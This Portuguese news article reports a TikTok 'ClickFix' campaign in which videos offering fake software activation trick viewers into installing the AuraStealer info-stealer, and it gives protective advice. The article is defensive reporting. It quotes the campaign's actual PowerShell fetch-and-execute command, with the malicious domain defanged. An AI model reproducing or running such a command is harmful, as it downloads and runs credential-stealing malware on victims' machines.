As plataformas de redes sociais, além de servirem como meios de entretenimento e comunicação, têm-se tornado ferramentas eficazes para a disseminação de ameaças à segurança digital.
Em maio, a Trend Micro divulgou um relatório que alertava para uma série de vídeos no TikTok utilizados como parte de uma campanha maliciosa que espalhava info-stealers, malwares capazes de roubar dados pessoais, logins de redes sociais, criptomoedas e outras informações sensíveis.
Na altura, o TikTok afirmou ter removido todas as contas mencionadas no relatório. No entanto, segundo o portal Bleeping Computer, novas contas estão a surgir para divulgar falsas chaves de ativação de softwares legítimos como Windows, Microsoft 365, Adobe Premiere, Photoshop e CapCut Pro, bem como assinaturas falsas de serviços como Netflix e Spotify Premium. Esta campanha cibercriminosa faz parte dos ataques cibernéticos apelidados de ClickFix.
Os vídeos explicam como o utilizador pode executar um comando via PowerShell para obter programas e serviços de forma gratuita. Contudo, trata-se de uma técnica de engenharia social, na qual os vídeos persuasivos convencem o público a seguir instruções que acabam por resultar na infeção dos seus computadores.
As publicações pedem que os utilizadores executem códigos como administradores do PowerShell, como este:
iex (irm slmgr[.]win/photoshop)
De acordo com o Bleeping Computer, este comando direciona para o site slmgr[.]win, responsável por descarregar e executar o código malicioso no dispositivo da vítima.
O malware identificado neste processo foi analisado através do VirusTotal e classificado como uma variante do AuraStealer, um info-stealer capaz de recolher e enviar aos criminosos credenciais de navegadores e aplicações, cookies e carteiras de criptomoedas.
Até ao momento da publicação desta matéria, verificamos que a conta do TikTok responsável pela divulgação dos códigos maliciosos ainda se encontra ativa.
Evita dores de cabeça: usa apenas software legítimo
A principal recomendação para não cair neste tipo de golpe é evitar recorrer a métodos de pirataria. Embora a internet esteja cheia de “truques” para ativar produtos e serviços premium, há sempre o risco de te tornares alvo de um ataque que pode roubar informações confidenciais.
Vídeos que pedem para copiar e executar códigos no PowerShell não devem ser seguidos sob nenhuma circunstância.
Mesmo que certas aplicações ou sistemas sejam caros, é sempre mais seguro obtê-los de forma legítima.
Procura promoções, cupons e planos familiares (que costumam ter bons descontos), ou opções de assinaturas anuais.
Caso tenhas sido vítima desta campanha maliciosa ou de outro ataque semelhante, redefine imediatamente as tuas palavras-passe em sites e aplicações sensíveis — como e-mail, contas bancárias, redes sociais e carteiras digitais.
TikTok ainda não se pronunciou
Até ao momento, o TikTok ainda não comentou esta nova vaga de vídeos usados para espalhar códigos maliciosos.
O 4gnews entrou em contacto com a plataforma para obter esclarecimentos sobre o motivo de estes conteúdos continuarem a circular. Esta matéria será atualizada assim que houver uma resposta da empresa.
